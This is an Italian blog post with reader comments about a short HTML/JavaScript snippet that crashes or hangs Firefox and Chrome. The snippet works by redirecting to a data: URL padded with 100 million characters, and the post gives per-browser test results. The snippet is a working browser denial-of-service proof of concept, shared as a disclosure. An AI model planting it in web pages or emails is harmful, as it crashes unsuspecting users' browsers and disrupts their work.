Ammazzabrowser

<!DOCTYPE html>
<html>
 <head>
 <script>
 location = 'data:text/html,<script>location = "location.toString + \"A\"";' + 'A'.repeat( 100000000 );
 </script>
 </head>
</html>

Questo semplice testo in una pagina HTML manda a zampe all’aria Firefox e Google Chrome, mentre Internet Explorer esce illeso.

Potete farlo da voi oppure andare a vostro rischio su crashfirefox.com.

Questi sono i risultati su test fatti al volo:

  • Ubuntu 14.10 64 bit:
    • Google Chrome 41.0.2272.89 64 bit: pagina He’s Dead Jim
    • Firefox 36.01: applicazione appesa e bloccata
  • Windows 7 Professionale 32 bit:
    • Google Chrome 41.0.2272.89 64 bit: pagina He’s Dead Jim
    • Firefox 36.01: crash
    • Internet Explorer 11.0.9600.17691 11.0.17 KB3032359: non interessato dal problema

Altri test possono essere aggiunti nei commenti.

Qualcuno pensa ancora che sia una bella idea la mail in HTML?

Autore: Luigi Rosa

Consulente IT, sviluppatore, SysAdmin, cazzaro, e, ovviamente, geek.

4 pensieri riguardo “Ammazzabrowser”

  1. Chrome Versione 41.0.2272.89 (64-bit) su OSX 10.10.2
    Crasha il tab di chashfirefox e il tab di siamogeek da cui ho lanciato il link, il resto delle pagine non hanno problemi. Posso chiudere quelle due schede e continuare tranquillamente a lavorare

    Versione 8.0.3 (10600.3.18)
    La pagina di crashfirefox resta bianca e non succede niente.

  2. Test su Kubuntu 14.04 64bit:

    – Rekonq Versione 2.4.2: nessun particolare problema
    – Cromium Versione 41.0.2272.76 Ubuntu 14.04 (64-bit): si blocca quella scheda, senza però impallare il browser
    – Firefox Versione 36.0.1: si blocca del tutto.

Spazio per un commento